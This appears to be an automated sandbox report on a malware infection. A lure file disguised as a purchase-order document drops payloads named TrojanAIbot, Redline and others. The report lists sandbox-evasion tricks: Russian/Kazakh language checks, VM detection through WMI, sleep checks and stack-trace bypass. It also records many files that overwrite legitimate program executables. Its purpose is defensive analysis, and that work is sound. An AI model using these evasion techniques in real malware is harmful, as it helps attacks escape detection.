Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\alg.exe	Code function: 6_2_006F52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	6_2_006F52A0
Source: C:\Windows\System32\AppVClient.exe	Code function: 10_2_00B652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	10_2_00B652A0
Source: C:\Windows\System32\FXSSVC.exe	Code function: 15_2_00DB52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]	15_2_00DB52A0

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00444078		0_2_00444078
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00444078		2_2_00444078

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\build.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	API/Special instruction interceptor: Address: 567C72C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	API/Special instruction interceptor: Address: 56A168C

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Memory allocated: 2DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Memory allocated: 2E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Memory allocated: 4E00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Memory allocated: 2490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Memory allocated: 1A6F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 990000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 26A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 46A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 24E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 2690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Memory allocated: 4690000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3120000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 9F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 23C0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599727	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599503	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599129	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598876	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598750	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598421	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598190	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 598062	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597953	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597830	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597225	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 597044	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 596576	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Window / User API: threadDelayed 5356	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Window / User API: threadDelayed 4269	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 1281
Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 2078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8625
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1042
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 8386
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 1404
Source: C:\Windows\System32\msdtc.exe	Window / User API: threadDelayed 486

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
